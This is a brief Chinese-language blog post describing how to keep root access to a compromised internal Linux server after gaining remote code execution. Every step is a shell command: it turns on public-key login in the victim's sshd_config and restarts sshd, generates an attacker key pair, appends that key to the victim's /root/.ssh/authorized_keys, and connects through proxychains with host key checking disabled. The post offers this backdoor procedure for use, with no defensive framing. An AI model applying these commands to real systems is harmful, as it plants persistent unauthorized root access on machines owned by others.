无密码通过代理登录内网linux服务器

  RCE root权限执行命令,无法读取密码的情况下

 

1:在受害者机子上执行如下命令,开启认证

# echo RSAAuthentication yes >> /etc/ssh/sshd_config
# echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
# systemctl restart sshd

  

2:回到本地linux上生成密钥对

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
# ls -al /root/.ssh/
# cp /root/.ssh/id_rsa.pub /home/sot/Desktop/
# mv /home/sot/Desktop/id_rsa.pub /home/sot/Desktop/authorized_keys

  

3:被害机子上执行,追加操作

# echo ssh-rsa AA**+ldFbB root@Riter >> /root/.ssh/authorized_keys

  

4:本地开代理执行

proxychains4 ssh -t -o "StrictHostKeyChecking no" root@172.16.7.28

  

posted @ 2021-04-05 23:13  BuXuan  阅读(129)  评论(0编辑  收藏  举报